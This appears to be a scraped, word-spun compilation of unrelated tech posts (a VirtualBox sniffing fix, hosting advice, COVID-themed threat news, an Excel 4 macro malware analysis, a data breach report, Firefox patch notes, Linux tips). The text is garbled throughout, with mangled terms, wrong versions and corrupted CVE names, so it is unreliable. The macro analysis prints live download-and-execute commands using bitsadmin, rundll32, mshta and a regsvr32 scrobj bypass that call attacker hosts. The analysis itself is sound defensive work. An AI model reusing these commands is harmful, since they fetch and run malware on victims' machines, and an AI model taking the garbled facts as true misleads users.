Author

admin

Browsing

 

I spent a bit of the day troubleshooting a community safety monitoring (NSM) drawback. I assumed I might share the issue and my investigation within the hopes that it would assist others. The specifics are most likely much less essential than the final method.

It started with ja3. It’s possible you’ll know ja3 as a set of Zeek scripts developed by the Salesforce engineering staff to profile consumer and server TLS parameters.

I used to be reviewing Zeek logs captured by my Corelight equipment and by one in every of my lab sensors operating Safety Onion. I had protection of the identical endpoint in each sensors.

I seen that the SO Zeek logs didn’t have ja3 hashes within the ssl.log entries. Each sensors did have ja3s hashes. My first thought was that SO was misconfigured one way or the other to not report ja3 hashes. I rapidly dismissed that, as a result of it made no sense. In addition to, verifying that intution required me to begin troubleshooting close to the highest of the software program stack.

I made a decision to begin on the backside, or near the underside. I had a sinking suspicion that, for some purpose, Zeek was solely seeing visitors despatched from distant methods, and never visitors originating from my community. That will account for the creation of ja3s hashes, for visitors despatched by distant methods, however not ja3 hashes, as Zeek was not seeing visitors despatched by native purchasers.

I used to be operating SO in VirtualBox 6.0.four on Ubuntu 18.04. I began sniffing TCP community visitors on the SO monitoring interface utilizing Tcpdump. As I feared, it did not look proper. I ran a brand new seize with filters for ICMP and a distant IP handle. On one other system I attempted pinging the distant IP handle. Certain sufficient, I solely noticed ICMP echo replies, and no ICMP echoes. Oddly, I additionally noticed doubles and triples of among the ICMP echo replies. That frightened me, as a result of unpredictable conduct like that would point out some form of software program drawback.

My subsequent step was to “get beneath” the VM visitor and decide if the VM host might see visitors correctly. I ran Tcpdump on the Ubuntu 18.04 host on the monitoring interface and repeated my ICMP assessments. It noticed all the pieces correctly. That meant I didn’t must hassle checking the change span port that was feeding visitors to the VirtualBox system.

It appeared I had an issue someplace between the VM host and visitor. On the identical VM host I used to be additionally operating an occasion of RockNSM. I ran my ICMP assessments on the RockNSM VM and, sadly, I acquired the identical one-sided visitors as seen on SO.

Now I used to be frightened. If the issue had solely been current in SO, then I might repair SO. If the issue is current in each SO and RockNSM, then the issue needed to be with VirtualBox — and I won’t be capable of repair it.

I reviewed my configurations in VirtualBox, making certain that the “Promiscuous Mode” beneath the Superior choices was set to “Enable All”. At this level I frightened that there was a bug in VirtualBox. I did some Google searches and reviewed some discussion board posts, however I didn’t see anybody reporting points with sniffing visitors inside VMs. Nonetheless, my use case may need been bizarre sufficient to not have been reported.

I made a decision to attempt a special method. I puzzled if operating VirtualBox with elevated privileges would possibly make a distinction. I didn’t wish to take possession of my consumer VMs, so I made a decision to put in a brand new VM and run it with elevated privileges.

Let me cease right here to notice that I’m breaking one of many guidelines of troubleshooting. I am introducing two new variables, after I ought to have launched just one. I ought to have constructed a brand new VM however run it with the identical consumer privileges with which I used to be operating the prevailing VMs.

I made a decision to put in a minimal version of Ubuntu 9, with VirtualBox operating through sudo. Once I began the VM and sniffed visitors on the monitoring port, lo and behold, my ICMP assessments revealed either side of the visitors as I had hoped. Sadly, from this I erroneously concluded that operating VirtualBox with elevated privileges was the reply to my issues.

I took possession of the SO VM in my elevated VirtualBox session, began it, and carried out my ICMP assessments. Womp womp. Nonetheless damaged.

I spotted I wanted to separate the 2 variables that I had entangled, so I finished VirtualBox, and adjusted possession of the Debian 9 VM to my consumer account. I then ran VirtualBox with consumer privileges, began the Debian 9 VM, and ran my ICMP assessments. Success once more! Apparently elevated privileges had nothing to do with my drawback.

By now I used to be glad I had not posted something to any consumer boards describing my drawback and asking for assist. There was one thing concerning the monitoring interface configurations in each SO and RockNSM that resulted within the incapability to see either side of visitors (and keep away from bizarre doubles and triples).

I began my SO VM once more and seemed on the script that configured the interfaces. I commented out all of the entries under the administration interface as proven under.

$ cat /and so on/community/interfaces

# This configuration was created by the Safety Onion setup script.
#
# The unique community interface configuration file was backed as much as:
# /and so on/community/interfaces.bak.
#
# This file describes the community interfaces accessible in your system
# and easy methods to activate them. For extra info, see interfaces(5).

# loopback community interface
auto lo
iface lo inet loopback

# Administration community interface
auto enp0s3
iface enp0s3 inet static
handle 192.168.40.76
gateway 192.168.40.1
netmask 255.255.255.0
dns-nameservers 192.168.40.1
dns-domain localdomain

#auto enp0s8
#iface enp0s8 inet guide
#  up ip hyperlink set $IFACE promisc on arp off up
#  down ip hyperlink set $IFACE promisc off down
#  post-up ethtool -G $IFACE rx 4096; for i in rx tx sg tso ufo gso gro lro; do ethtool -Ok $IFACE $i off; completed
#  post-up echo 1 > /proc/sys/internet/ipv6/conf/$IFACE/disable_ipv6

#auto enp0s9
#iface enp0s9 inet guide
#  up ip hyperlink set $IFACE promisc on arp off up
#  down ip hyperlink set $IFACE promisc off down
#  post-up ethtool -G $IFACE rx 4096; for i in rx tx sg tso ufo gso gro lro; do ethtool -Ok $IFACE $i off; completed
#  post-up echo 1 > /proc/sys/internet/ipv6/conf/$IFACE/disable_ipv6

I rebooted the system and introduced the enp0s8 interface up manually utilizing this command:

$ sudo ip hyperlink set enp0s8 promisc on arp off up

Fingers crossed, I ran my ICMP sniffing assessments, and voila, I noticed what I wanted — visitors in each instructions, with out doubles or triples no much less.

So, there seems to be some form of drawback with the best way SO and RockNSM set parameters for his or her monitoring interfaces, at the very least so far as they work together with VirtualBox 6.0.four on Ubuntu 18.04. You may see within the community script that SO disables a bunch of NIC choices. I think about a number of of them is the perpetrator, however I did not have time to work via them individually.

I attempted looking on the community script in RockNSM, but it surely runs CentOS, and I will be darned if I can not determine the place to look. I am positive it is there someplace, however I did not have the time to determine the place.

The ethical of the story is that I ought to have instantly checked after set up that each SO and RockNSM had been seeing either side of the visitors I anticipated them to see. I had taken that without any consideration for a lot of earlier deployments, however one thing broke not too long ago and I do not know precisely what. My workaround will hopefully maintain for now, however I must take a more in-depth have a look at the NIC choices as a result of I could have launched one other fault.

A second ethical is to watch out of adjusting two or extra variables when troubleshooting. If you do that you just would possibly repair an issue, however not know what change mounted the problem.

oracle virtualbox user manual,oracle virtualbox features,virtualbox 6.1 user manual pdf,90 oracle virtualbox,virtualbox dashboard,how to create vm in virtualbox,what is oracle virtualbox,how to use virtualbox

 

Virtually all internet hosting firms declare to be the #1 within the enterprise. When shopping for internet hosting, there are some important factors to think about. Typically any person decides to purchase a internet hosting, he seems to purchase a plan with every thing limitless.

All firms assure to supply limitless storage, limitless bandwidth, limitless emails, and so forth. However is that basically the case? Or must you search for every thing limitless in a internet hosting plan? Let’s discuss this one-by-one.

Limitless storage

server cloud storageserver cloud storage

Storage capability ought to by no means be the #1 issue when shopping for a internet hosting plan for a standard web site. Most suppliers declare to supply limitless storage of their “Really useful plans” aka. “Hottest plans”. We’ll discuss concerning the actuality of limitless storage in a bit.

Clearly the quantity of storage your web site wants relies upon upon the content material you’re going to host in your web site. If you’re internet hosting a easy WordPress weblog, don’t worry concerning the storage capability as you’ll have loads of storage for pictures, and smaller movies on the essential plan.

Solely instances once you want extra storage is when internet hosting movies or massive information in your server. In that case, you’ll not wish to purchase a shared internet hosting. You have to to go for both VPS or a devoted server. VPS and devoted servers are the most effective for storage & knowledge processing as you’ll be able to improve server anytime.

Additionally, in shared internet hosting, limitless storage function is just like the zeros in 1.000000. There are six zeros within the quantity however price nothing. Shared internet hosting plans could function limitless storage however they set a cap on Inode.

An Inode is a file in your server. It may very well be a textual content file, html web page, picture, video, and many others. Inode restrict cancels out the limitless storage function. Most firms set Inode restrict from 100,000 to 250,000 which implies you cannot save greater than the set Inode restrict in your server.

After the Inode restrict is reached, your web site will begin to undergo. It will be unable to create cache information, server logs won’t be saved and the server will throw errors. Host steadily checks for accounts utilizing greater than the brink restrict and droop such accounts if vital.

So once you want extra storage, go for VPS or a devoted server as there isn’t a Inode restrict there. You may also improve your storage anytime you want it.

Limitless bandwidth & emails

LAN cable

Limitless bandwidth & emails are highlighted options in nearly all internet hosting plans. Bandwidth is the quantity of information transferred out of your server to the consumer. Like limitless storage, limitless bandwidth can also be not included in primary plans.

Like limitless storage isn’t really limitless, limitless bandwidth can also be not limitless. There’s a restrict that they think about regular and solely enable the bandwidth in that restrict. It could sound unusual nevertheless it’s the fact. Anyway, in your particular case, in case your web site will not be a particular software that requires an excessive amount of knowledge to drag from the web or ship it to the consumer, you’ll be able to go along with the essential plan.

Whereas on the lookout for internet hosting for a standard weblog, you’ll be able to ignore the bandwidth choice. Simply go along with the essential one and in a while you’ll be able to improve to a better plan. For now, lower your expenses in your new enterprise.

Most firms present just a few free e mail accounts with the essential plan. When you have a number of site owners, chances are you’ll want to purchase extra e mail accounts. Right here you’ll be able to select in case you want extra emails after which go along with the plan that gives sufficient e mail accounts for you. Additionally, don’t forget the storage they supply for emails. In free accounts, some internet hosting firms solely present 50MB area for every e mail account.

Additionally, guarantee that the internet hosting supplier has instruments to guard you from spam emails. They steadily scan emails for any malicious attachment and correctly transfer spam to the spam folder.

Limitless database

Database schema

Most internet hosting suppliers help MySQL database. This database is totally different from the disk storage(although it’s saved on the identical disk). Database is the place your web site saves posts, merchandise, and different web site content material. For every web site, you want a minimum of one database. If you’re internet hosting one web site, you’ll need one database.

Limitless web sites

Limitless web site can also be one of the enticing options. Most internet hosting firms embrace limitless web site in superior plan. Solely go for this function if you wish to host a number of web sites.

Cons of limitless web site

Limitless web site function comes at a price. It doesn’t matter which plan you purchase, as I stated above most internet hosting firms put limits on all of the companies they supply. Should you cross the restrict, your account can be flagged for assessment and should even be suspended. Internet hosting a number of web sites on one server is each efficiency and safety threat. If one in all your web sites is compromised, others are additionally in danger.

Focus in your wants

All of the options I discussed above are necessary for some kind of customers however not all. If any of the options you want, go along with it however keep in mind that it’s not limitless.

Analyze your web site’s wants. Don’t fall into the “limitless entice”. Should you want 10GB storage, simply go for the essential plan and lower your expenses. You possibly can all the time improve your internet hosting in case you want extra storage, extra bandwidth, and extra web sites.

Tips on how to choose internet hosting supplier?

Dwell buyer help

All of the options I discussed and people didn’t point out are offered by each internet hosting supplier. So what internet hosting firm must you go along with?

live customer support

Very first thing first. Be certain that there’s a reside help system. Dwell help is a very powerful function that you need to be on the lookout for. When your web site goes down or runs into some other kind of error, your host ought to show you how to repair the issue instantly.

Server uptime

Secondly, examine the server uptime. You are able to do that by studying present buyer critiques and repair critiques by different bloggers.

Newest applied sciences + straightforward to make use of cPanel

Double examine that the internet hosting firm has all the newest variations of the instruments obtainable within the repository. For instance, if you’re internet hosting a WordPress weblog, the newest model of PHP must be obtainable.

cPanel is the dashboard of your internet hosting. Guarantee that cPanel is simple to make use of by asking them for a demo.

Reasonably priced pricing

Many internet hosting price you the earth for his or her primary plans. So view every service’s plan fastidiously and discover the one which has sufficient options in your wants and likewise inexpensive.

Instruments emigrate your present web site

If you’re migrating the present web site to a different host, then guarantee that the host supplies instruments to make the migration course of simpler and safe. Normally, the migration course of will not be troublesome however any tiny mistake can corrupt your complete web site database.

Conclusion

To conclude this, simply consider shopping for internet hosting as shopping for a home. The larger the home the dearer it’s. You don’t want to purchase a home that’s larger than your wants plus you’ll need to spend a ton of cash on that.

Additionally don’t forget the limitless phrases that I’ve simply talked about within the article. Customers like to see limitless within the plan so firms have labored round it. They’ve included limitless phrases with out really implementing it into the companies.

features of web hosting,things to know before hosting a website,what to look for when choosing a web hosting company,best web hosting for beginners,what needs to be taken into consideration to host a website,all of the following factors are important to consider when selecting a web host except,why use web hosting service,web hosting features explained

 

Though the usage of international occasions as a automobile to drive digital crime is hardly stunning, the present outbreak of COVID-19 has revealed a mess of vectors, together with one particularly that’s considerably out of the extraordinary. In a sea of provides for face masks, a current posting on a darkish internet discussion board reveals the sale of blood from a person claiming to have recovered from Coronavirus.

What are we doing?

Placing our clients on the core is what McAfee does. Day by day updates are offered to merchandise throughout the McAfee portfolio, with vetted data to safe your helpful belongings in firm or working from house.

The amount of threats associated to COVID-19 has been vital, with lures utilized in all method of assaults. Monitoring these campaigns reveals probably the most focused sector is healthcare, adopted by finance, after which training.

Cellular Threats

In March 2020 alone, McAfee Labs recognized a number of malicious Android functions abusing key phrases related to the pandemic. The apps vary from ransomware samples to spy-agents that spy on the sufferer’s machine. For instance, statically analyzing an app referred to as “Corona Security Masks,” we observe that the quantity of permissions is suspicious:

  • Full Web entry that enables the app to create community sockets
  • Learn contact knowledge from the sufferer’s machine
  • Ship SMS messages

When the consumer downloads the app, it may order a facemask from the next website: “coronasafetymask.tk.” The SMS ship permission is abused to ship the rip-off to the sufferer’s contact listing.

Though attribution will clearly be a key concern it’s not the first focus of our analysis, nonetheless there seems to be APT teams incorporating  the COVID-19 theme into their campaigns. For instance, spreading paperwork that discuss in regards to the pandemic and are weaponized with malicious macro-code to obtain malware to the sufferer’s system.

Underground Marketplaces and scams

We’ve got seen many examples of main occasions being abused by individuals whose curiosity is simply monetary achieve and present international occasions are not any exception. We carried out a brief survey on some underground markets and Telegram channels providing protecting masks and extra. Two examples are proven beneath:

Onion-site providing masksTelegram channel with a number of sellers of masks

Using COVID-19 as a lure doesn’t seem to indicate any signal of slowing down, certainly there are extra campaigns being often recognized utilizing the worldwide concern for egocentric achieve. Our focus shall be to make sure detection stays updated, and knowledge factors related for investigation are shared with authorities.

Within the meantime, we are going to proceed to disseminate related menace data. To be stored up-to-date as we publish extra content material,  keep related to the McAfee Labs Twitter feed.

Lastly, whereas COVID-19 associated threats are on the rise, from phishing emails name-dropping the illness to malware named after fashionable video conferencing companies, cybercrime in all points continues, and we should stay vigilant to different, conventional threats as nicely. For instance, tricks to safe the newly huge cellular workforce may be discovered right here.

Please keep secure.

x3Cimg top=”1″ width=”1″ model=”show:none” src=”https://www.fb.com/tr?id=766537420057144&ev=PageView&noscript=1″ />x3C/noscript>’);

 

A latest weblog by Didier Steven’s confirmed how malicious Excel Four macros may be saved in OOXML (Workplace Open XML) .xlsm – a macro particular file format. We discovered this very attention-grabbing as a result of though Microsoft way back changed Excel Four macros with VBA (Visible Fundamental Utility), Excel Four macros nonetheless work and are nonetheless supported within the newer Excel 2017 XML format.

Not lengthy after that weblog was printed, whereas scrounging round our spam honeypots we noticed this “TurboTax Case” spam marketing campaign with a .XLSB attachment.

Figure1a

Determine 1. Spam Pattern

Figure2

Determine 2. XLSB File Icon

XLSB is just like XLSM format the place they’re each saved in a ZIP container, nonetheless, the data in an XLSB file is saved as binary versus the standard XML format.

Figure3

Determine 3. XLSB File Header

Figure4

Determine 4. Contained in the ZIP container we will discover the malicious BIFF Object in binary format

Extracting and viewing the BIFF object file sheet1.bin in a hex viewer, reveals a bunch of attention-grabbing shell instructions. We’ll have a look at this additional, however word that at this stage this object is a hidden worksheet.

Figure5

Determine 5. Hex view of sheet1.bin

So, we dug in and investigated this XLSB file, however as a substitute of utilizing instruments like oledump.py, we used the Excel software itself to research these macros.

Opening the malicious excel sheet, a safety warning is offered to the unsuspecting end-user, after which a plain textual content lure instructing the consumer to allow the macro, this a quite common social engineering tactic. The consumer should allow macros by way of the Choices button as under.

Figure6

Determine 6. Safety Warning

At this stage, we have to unhide some stuff. Unhiding the worksheet may be executed by right-clicking on “Sheet1” tab then clicking the “Unhide…” on the context menu:

Figure7

Determine 7. Unhiding the hidden sheet

Now that the Macro sheet has been unhidden, we are actually capable of see the Named reference to Auto_Open. Nevertheless, it looks as if it resides in a hidden column – Column A.

Figure8

Determine 8. Hidden macro sheet

We are able to unhide Column A by doing the next: On House tab, then within the Cells group, click on Format, then click on “Cover & Unhide” then “Unhide Columns”

Figure9

Determine 9. Unhiding the hidden column

Then tadaa! Now it reveals the hidden column “A” with all this suspicious EXEC formulation to run exterior instructions

Figure10

Determine 10. Revealing the malicious EXEC formulation

How do these instructions get executed? The macro occasion Auto_Open is referred to the cell “=Macro1$A$1” which incorporates the formulation  “=EXEC(“cmd.exe /c cd c:&&mkdir Intel”)”

Figure11

Determine 11. Auto_open refers to cell A1

The entire above formulation in column “A” are then executed so as till  HALT() is encountered.

In abstract, the macros execution stream is as comply with:

  1. Create a listing at c:Intel
  2. Create a bitsadmin switch job known as “myjob” to obtain a file from https://kilolo.web site/admin.bat and reserve it to c:inteladmin.bat
  3. Create a bitsadmin switch job known as “myjob” to obtain a file from https://kilolo.web site/mer.bin and reserve it to c:intelmer.bin
  4. Create a bitsadmin switch job known as “myjob” to obtain a file from https://kilolo.web site/mer.dll and reserve it to c:intelmer.dll
  5. Rename mer.bin to mer.exe
  6. Copy mer.dll to mery.dll
  7. Execute:
    1. rundll32.exe mer.dll, Run https://38.132.124.172:443/
    2. regsvr32 /s mery.dll, Run https://38.132.124.172:443/
  8. Execute a powershell command from:
    1. http://kilolo.web site/uncooked.txt
    2. https://kilolo.web site/uncooked.txt
  9. Execute mshta http://37.72.175.188:80/house
  10. Execute a Jscript from a distant server utilizing AppLocker Bypass method:
    1. regsvr32 /s /u /n /i:http://37.72.175.188:443/index scrobj

On the time of study, The URLs kilolo[.]web site and 38[.]132[.]124[.]172:443 are already offline aside from hxxp://37[.]72[.]175[.]188:443/index

The final EXEC command is a JScript execution from the distant host at 37.72.175.188. The deobfuscated and beautified code may be discovered right here: https://gist.githubusercontent.com/drole/b66464abca888f5cc77ea4519acd1584/uncooked/1c07055fbaaa4911b5cdf5d754e034ffd6ac8810/payload.js

Figure12

Determine 12. Obfuscated JScript Payload

This JScript fundamental perform is to collect system data and ship again to the command and management server.

To conclude, this very outdated macro performance in Excel remains to be supported and is now being misused by the criminals. It represents one more means the dangerous guys are abusing these kinds of doc file codecs. Consider the malicious code on this instance won’t execute until the consumer allows macros.

IOCs

1e1afc93c8092b2c7e49a6d3a451629f (XLSB)
40a941bc585c6e8f1203a9854faf90advert (Jscript 2nd stage payload)

 

How does one outline “good” within the digital age?  It may be argued that the time period represents a inventive resolution pushed by a exact mission.  To a different, it’s outlined by the most recent machine studying (ML) algorithms and synthetic intelligence (AI)-guided decision-making options within the latest launch of a instrument.  Whereas its that means varies for every stakeholder, the general public sector – good authorities – is evolving towards a unified structure that encourages integration, agile innovation, and data sharing throughout platforms and Businesses.

The definition of “endpoint” has advanced past a typical working system (OS) to a myriad of routers/switches, platform applied sciences, industrial management techniques (ICS), and Web of Issues (IoT) units.  It’s forecasted that the variety of linked IoT units will surpass 25 billion by 2021.  This transformation, mixed with the speedy adoption of mobility and cloud, creates a posh setting and expanded assault floor at a time when threats are extra refined than ever earlier than.

ICS and IoT current distinctive challenges as weak safety controls and lack of asset visibility give attackers the benefit.  A elementary distinction additionally exists between conventional Data Expertise (IT) techniques and ICS/IoT; IT is information-focused, whereas ICS is targeted on the bodily course of with its personal set of community protocols.  For instance, an exploit which creates Stage 2 (Management) entry of the Purdue Mannequin is a first-rate goal for cyberwarfare on essential infrastructure.  Most ICS/IoT challenges may be boiled down to 3 major classes: Asset Discovery and Monitoring, Risk Detection, and Danger Administration.

Asset Discovery and Monitoring

How will you defend what you’ll be able to’t see?  Complete safety requires full visibility of every asset, its standing, and its communications throughout the setting.  Configuration change management is essential.  Correct authentication and validity of the PLC instructions have to be monitored to make sure there aren’t any disruptions to the bodily processes.

Risk Detection

Ransomware is a rising menace and is anticipated to focus on an rising variety of IoT units.  Embedded safety controls paired with the most recent menace intelligence fight threats that could be prevalent on the community and/or particular units.  With essential infrastructure, zero-day malware is a high concern and highlights the significance of vendor integrations that share a typical message bus.  The power for one instrument to establish a beforehand unknown menace, concurrently inoculate the enterprise, and share the symptoms in real-time throughout Businesses sends a robust message.

Danger Administration

It solely takes a single compromised machine to infiltrate the community.  Understanding weak units, patch ranges, and misconfigurations is a vital step in decreasing the assault floor.  Complete reporting and habits evaluation assist lesson the setting threat profile and reply some frequent questions: What has exceeded the baseline?  Is that this unauthorized use?  What adjustments have been made to the system configuration?

As the general public sector continues to innovate, undertake new applied sciences, and embark on the journey to cloud, integration turns into the “good” path to mission success.  Convergence creates simplicity.  Safety options have to be unified to create an environment friendly and constant safety administration expertise that adapts to dynamic and hybrid environments.  At present’s cybersecurity challenges require an open and collaborative strategy to scale back threat and fight the adversary; no single vendor can fulfill each requirement of the enterprise.  Interoperability offers a cohesive ecosystem which maximizes the worth of present safety investments.

As environments evolve and change into extra complicated, guarantee your safety distributors share the identical ardour and tenacity in your mission. Fixed innovation ought to be the norm as we face our adversaries collectively as one group.  With our companions, we will present a holistic and unified structure that breaks the normal silos and ushers in a brand new period of cybersecurity prowess.  We’re higher collectively. Problem your safety distributors to work along with you in help of reaching the specified final result and mission goals.

Study extra about MVISION Cloud Portfolio

x3Cimg peak=”1″ width=”1″ fashion=”show:none” src=”https://www.fb.com/tr?id=766537420057144&ev=PageView&noscript=1″ />x3C/noscript>’);mcafee blog,www mcafee com wfh,integration examples

If you are a new Linux user and looking for help in one of the Linux forums, you may be asked this question:

Which office environment do you use?

You have an idea of what an office environment is, but how do you know which one you’re using? I’ll tell you how to find out. First of all, I will show you the command line method as it applies to all types of Linux distributions. I’ll also show you a graphical way to get this information.

Check which desktop environment you are using.

Review of the working environment

You can use the echo command under Linux to display the value of the XDG_CURRENT_DESKTOP variable in the terminal.

Open the terminal and copy this command:

echo $XDG_CURRENT_DESKTOP

For example, this shows that I am using the GNOME Desktop in Ubuntu 20.04:

E-mail protected]:~$ echo $XDG_CURRENT_DESKTOP
ubuntu:GNOME

Although this command quickly tells you which desktop environment is being used, it does not provide any other information.

Knowledge of the version of the desktop environment (also called DE) can be important in some cases. Each new version of the software introduces or removes new features. GNOME 3.36 has a Don’t Disrupt option that allows you to disable all desktop notifications.

Suppose you have read this new request so as not to disrupt the function. You check if you are using GNOME, but you don’t see this option on the GNOME desktop. If you could check the version of the GNOME Desktop installed on your system, this might clarify the situation.

I will show you the commands to check the desktop environment version because you can use them on any Linux with a running desktop environment.

Where did you get versionof the desktop environment?

Unlike searching for the name of the desktop environment, it is not easy to find the version number because there is no default command or environment variable that can provide this information.

One way to get information about the Linux desktop environment is by using a tool like Screenfetch. This command line tool shows the logo of your Linux distribution in ascii format and some basic system information. The desktop version is one of them.

For Ubuntu-based distributions, you can install Screenfetch by enabling the Universe repository and then use this command:

sudo aptch screenfetch installation

For other Linux distributions you can use the package manager of your system to install this program.

After installation, all you need to do is enter a screenshot into the terminal and the desktop environment version should be displayed along with other system information.

Desktop environment Version control Desktop environment Version control

As you can see in the figure above, my system uses GNOME 3.36.1 (mainly GNOME 3.36). You can also see the Linux kernel version and other details here.

Please note that there is no guarantee that Screenfetch will display the version of the desktop environment. I checked the sources, and it contains a lot of if-else code to get version information from many sources and settings in different desktop environments. If it finds nothing in the version, it will only display the name DE.

Using the GUI to test the desktop environment

Nearly all desktop environments provide basic system information in the Settings – Startup section.

The only big problem is that most EDs are different, so I can’t show the exact steps for each of them. I’ll show it to GNOME and let you find it on your desktop.

Therefore, you need to search in the menu settings (press the Windows key and perform the search) :

Application menu settings Search application settings

Below you will find a section about the program. Click on it and you have a desktop environment with the correct version.

Audit of the Ubuntu desktop environment Audit of the Ubuntu desktop environment

As you can see, this shows that my system uses GNOME 3.36.

I hope you find this quick tip useful for beginners. If you have any questions or suggestions, please leave a comment below.

https://i1.wp.com/itsfoss.com/wp-content/uploads/2020/04/check-desktop-environment.jpg?fit=800%2C450&ssl=1

Do you like what you read? Please share it with others.change desktop environment ubuntu,gnome,parrot os change desktop environment,xfce,lxde,how to change the desktop in ubuntu,how to change the desktop in linux,lubuntu switch desktop environment

Chopped Unacademy

Recently it was reported that India’s largest e-learning platform, Unacademy, was hacked into Bangalore, hackers had access to Unacademy and stole data from over 22 million users.

The popular company Cyber Security, Cyble Inc., reported this massive data breach, and according to security reports, all this stolen data was also offered for sale on the black web.

Security company Cyble reported that 21,909,707 Unacademy data was hacked, and this massive data breach cost $2,000.

The largest e-learning platform Unacademy India, recently funded by Facebook, General Atlantic and Sequoia. In addition, the current market value of the Academy is $500 million.

Data leakage includes username, email addresses, hash passwords, date of login or previous login, and much more.

http://31.220.61.170/wp-content/uploads/2020/05/1588980875_7_Indias-Largest-Online-Education-Platforms-Unacademy-Hacked.png

In addition, even the cyber security company and the BleepingComputer security portal investigated the whole thing, as well as the data the hackers brought in, where they found enterprise-level data.

  • ID
  • Encrypted password
  • Username
  • Postal address
  • Name
  • Last name
  • Login date.
  • Last login
  • the rest of
  • active
  • Is_superuser

An investigation of these two security portals has shown that in addition to the information mentioned above, several employees of Wipro, Infosys, Cognizant, Google, Facebook, Reliance Industries, HDFC, Accenture, ICICI, SBI, Canara Bank, Bank of Baroda, Punjab National Bank and several other large companies have been compromised.

In such a situation, the network of these companies is exposed to a serious threat to security.

The co-founder and technical director of the Unacademy, Hemesh Singh, acknowledged the data breach and said the students’ information is now secure.

http://31.220.61.170/wp-content/uploads/2020/05/1588980875_81_Indias-Largest-Online-Education-Platforms-Unacademy-Hacked.png

This is what the co-founder and technical director of the Hemesh Singh Academy said: We are following the situation closely and believe that out of the 22 million cases reported, some information has leaked out to 11 million students. This is due to the fact that only about 11 million e-mail user data are available on the Unacademy platform.

Unacademy uses the PBKDF2 algorithm to store data in encrypted form; this is a security mechanism designed to reduce vulnerability to brute force attacks. In addition, Hemesh Singh, co-founder and technical director of the Academy, said the Academy also uses OTP-based connection systems for additional security.

Kyblos recommendations

  • Users must change their passwords immediately.
  • Enable the two-factor authentication security.
  • Use a strong and complex password.
  • Avoid using your company’s e-mail addresses for third party services.
  • Users should also keep a close eye on their financial transactions just to detect suspicious activities.

You can follow us on Linkedin, Twitter, Facebook to get daily news about cybersecurity and hackers.unacademy hacked news,unacademy plus,unacademy offline classes,unacademy live classes,unacademy educator,unacademy facebook login,unacademy group,unacademy news

Firefox has just released its latest version, which will be available from Tuesday 4 to Tuesday 4 and contains many bug fixes, including three that have been marked as critical.

Version 76.0 also comes with fanfares for the new features added to the Firefox password manager, and the Coronavirus pandemic is now an unknown reason to praise these features:

There is no doubt that in recent weeks you have signed up for new online services, such as streaming movies and shows, exporting orders or delivering products to your home. All of these new accounts require unique and secure passwords that can now be easily generated, managed and protected with Lockwise Firefox.

Lockwise is a combined Firefox password manager for mobile phones and browsers that now warns you about what he thinks has been compromised.

According to Mozilla, Firefox will automatically warn you if it thinks one of the websites you have an account on is affected by a data breach.

It is therefore not surprising that this warning is called a site violation warning and is activated when you changed your password for the last time on the site before the violation took place:

http://31.220.61.170/wp-content/uploads/2020/05/Firefox-76.0-released-with-critical-security-patches---update-now.png-pdatenow.png

The vulnerable password warning will also be released for the first time, which none of us should need, but many of us would probably still be able to handle it:

http://31.220.61.170/wp-content/uploads/2020/05/1588996474_264_Firefox-76.0-released-with-critical-security-patches---update-now.png- update-nu.png

This will tell you whether your other passwords match the password you used on the site, which most likely violated the data.

Ideally, we want the warning to appear every time you start your browser if two passwords are the same, so that you are regularly and strongly encouraged to change them both into something new, complicated and unique.

But Firefox is a bit softer, probably the best place to start.

(We’ll assume that if you have a password that you use for many accounts, it’s because you think they’re going to stop, so you’re probably using a short, obvious password – but you don’t have to choose a trivial one if your password manager can easily generate and remember complex passwords).

Of course, if you already have a password manager that satisfies you, or if you have an incredible amount of storage space for c0MPlic4ted sTR!nZ OV unu5$l t3KSt, then of course you won’t be interested in these new features, but you still need an updated version to fix their security.

As mentioned above, three out of eleven safety patches with CVE numbers are considered critical:

  • CELLAR-2020-12387: Unnecessary use during a work stoppage. This is a potentially dangerous accident, suggesting that a sufficiently skilled fraudster could use this error to implement malicious software.
  • CELLAR-2020-12388: Leave the sandbox with badly guarded passes. Escape from the sandbox means that the content of unauthorized websites can be bypassed from the security check, allowing the browser to store data from different websites and suspicious websites cannot communicate with trusted parts of your computer, such as the data stored on your hard drive.
  • CELLAR-2020-12395: Fixed a memory error in Firefox 76 and Firefox ESR 68.8. This is a common Firefox vulnerability trap and includes eight different vulnerabilities found in Mozillan’s routine checks and tests.

Note that the second vulnerability mentioned above is specific to Firefox on Windows, although you should not use it as a reason to delay the update if you have a Mac or Linux/Unix computer.

There’s a separate entry, CVE-2020-12395, highlighted high rather than critical, which relates to the five bugs found in Firefox 75, but not in the 68.7 Extended Support Release (ESR), which reminds us that new features sometimes cause new bugs.

The Tor-browser, based on Firefox ESR, will also get an update, a somewhat confusing change from 9.0.9 to 9.0.10.

(If you are a Tor user, you can check which versions of Firefox your current Tor is based on in the About Tor Browser dialog).

What should I do?

As usual: Go to Help > About Firefox (or about the Tor browser) to see if you know.

Otherwise, the update will be requested and you will be prompted to perform the update – a restart of Firefox will automatically apply the update and restart the new version.

If you are using Linux or xBSD with a version of Firefox provided by your distribution, you should check the update servers of your distribution to find and get all available Firefox fixes.

Newest Podcast Bare Securityfirefox 32-bit,firefoxexe,mozilla firefox free download,firefox what's new,firefox for vista,download fox

As Linux becomes more and more user-friendly, game developers are adding support for Steam. The performance of Graphics Processing Units (GPUs) mainly depends on the drivers. Ubuntu uses the Open Source New graphics driver by default, which offers limited support and capabilities compared to Nvidia’s own drivers.

The Nvidia driver is important for Ubuntu users who want to play games. However, if you are a new user, you do not need to install this driver because it works well with open source.

In this tutorial we will learn the different ways to install Nvidia drivers under Ubuntu 20.04 LTS.

Hardware CheckGPU Information

Before installing the Nvidia drivers under Ubuntu, make sure that the Nvidia GPU is installed on your system. There are many commands to get detailed information about Linux hardware.

To confirm, simply execute the following hwinfo command.

$ sudo hwinfo – gfxcard – short

You can check which card is used by the prime-select command:

Sudo prime selection

The lshw command can display information about the equipment and driver of the Nvidia card currently in use.

sudo lshw -c Display | grep NVIDIA

The lspci command is another way to get information about GPU hardware.

sudo lspci -nnk | grep -iA3 vga
or
$ sudo lspci | grep -i -color ‘vga|3d|2d’.

If you have installed the inxi tool, execute the following command.

$ sudo inxi -Gx

Install the Nvidia drivers with the graphical interface.

We will first check how to install the Nvidia driver of the GUI. Call the Software Update Manager from the main menu and click on it to open it.

Click on the Settings & Livepatch button in the pop-up window of the updater, as shown in the figure.

The Software and Updates window will then open as shown below:

